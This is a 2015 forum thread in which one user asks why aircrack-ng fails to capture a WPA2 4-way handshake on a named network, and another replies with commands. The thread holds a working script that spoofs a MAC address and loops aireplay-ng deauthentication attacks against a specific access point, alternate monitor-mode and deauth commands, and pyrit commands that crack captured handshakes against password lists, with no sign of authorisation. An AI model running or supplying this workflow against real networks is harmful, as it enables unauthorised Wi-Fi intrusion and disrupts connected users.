Can't capture WPA handshake

[GarrettVD]

I'm trying to capture a 4-way WPA handshake using the Aircrack-ng suite of tools, in order to capture a 4-way WPA handshake.

The first issue was that, depite being in very close proximity, I was unable to see any clients in the terminal or .csv logs while running airodump-ng targeting a specific bssid on channel 1 + sending a few mass (ie. not targeted to a specific client MAC) deauth's every 15 seconds. No clients in the .CSV logs, yet I was able to see lots of probe responses from clients on the network, and beacons etc. (See screenshot #1)

So I then tried to target a specific device MAC address on the network. (Screenshot #2) The device appeared under in the CSV log under Station MACs. But still, no WPA handshakes. Weird. So I checked the logs, and I can see that there is communication to the AP from the client, and vice-versa, but no handshakes. Hmmm.

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
6C:19:8F:E5:G5:1E, 2015-10-10 00:37:36, 2015-10-10 00:40:09, 1, 54, WPA2, CCMP TKIP,PSK, -54, 1106, 96, 0. 0. 0. 0, 6, KingEagle,


Using the


#!/bin/bash
airmon-ng stop wlan1mon; \
ifconfig wlan1 down; \
ifconfig wlan0 down; \
macchanger -r wlan1; \
ifconfig wlan1 up; \
airmon-ng start wlan1 1; \
airodump-ng -c 1 --bssid 6C:19:8F:E5:G5:1E --showack --write /usb/airdump-log wlan1mon </dev/null &>/dev/null & \
while sleep 15; do aireplay-ng -0 5 -a 6C:19:8F:E5:G5:1E wlan1mon --ignore-negative-one; done


I'm attaching a screenshot of the probe responses and deauthentication packets.

Any help would be great!

Thanks,

Screenshot #1 - Mass Deauthentication

Screenshot #2 - Targeting HonHai___

Edited October 11, 2015 by GarrettVD

[hairbag]

ifconfig wlan1 down

macchanger -r wlan1

iwconfig wlan1 mode monitor

ifconfig wlan1 up

airodump-ng -c 10 -w /path/to/Capture/output/NETGEAR --bssid 00:11:22:33:44:55 wlan1

//deauth client mac 5x
aireplay-ng -0 5 -e NETGEAR -c 00:11:22:33:44:55 wlan1

Edited October 11, 2015 by hairbag

[GarrettVD]

Isnt that pretty much the same thing?

[hairbag]

you are out putting to a virtual device or file i think? how do you analyze the captured handshakes?

different method of implementing the monitor mode too

[GarrettVD]

Yeah logging to /usb/ which is just a USB stick mounted via fstab

Checking for handshakes in Wireshark using the .cap file, filtering with filter "eapol"

[hairbag]

havent played with wireshark enough to comment on it but above is what ive used and it always works. not sure about your script as i just do it manually in two terminal windows. one for capture and one for deauth.

after capture analyze with pyrit if you are set up for gpu processing

//analyze

pyrit -r /path/to/capture/files/SSID-01.cap analyze

//strip and clean cap file

pyrit -r /path/to/capture/files/SSID-01.cap -o /path/to/capture/files/SSID-01.cap.gz strip

//passthrough attack

pyrit -r /path/to/capture/files/SSID-01.cap.gz -i /path/to/password/files/superWPA.lzma -b 11:22:33:44:55:66 attack_passthrough

or database

//import passwords

pyrit -i /path/to/password/files/superWPA.lzma import_unique_passwords

//add ssid to database

pyrit -e create_essid SSID

//batch process rainbows
pyrit batch

//attack cap file

pyrit -r /path/to/capture/files/SSID-01.cap.gz attack_db --all-handshakes

//delete ssid from db

pyrit -e SSID delete_essid

Edited October 13, 2015 by hairbag

[GarrettVD]

That's all true man but where I'm having the issue is with capturing the intial 4-way handshake.

[hairbag]

open up two terminals and if your arent seeing clients and the ssid in the airodump window you wont get handshakes, deauth wont work unless your nic's support injection. i remember seeing something somewhere about non-patched drivers and having to use --ignore-negative-one to avoid errors ,

what type of network adapters are you using? buy some alfa's and you will do the dance of joy.

in your script you put wlan0 down after putting wlan1 in monitor mode...try on wlan0

try

airodump-ng wlan0 --manufacturer --wps

if you dont get a big list of all your neighbors wifi then your nic is the issue.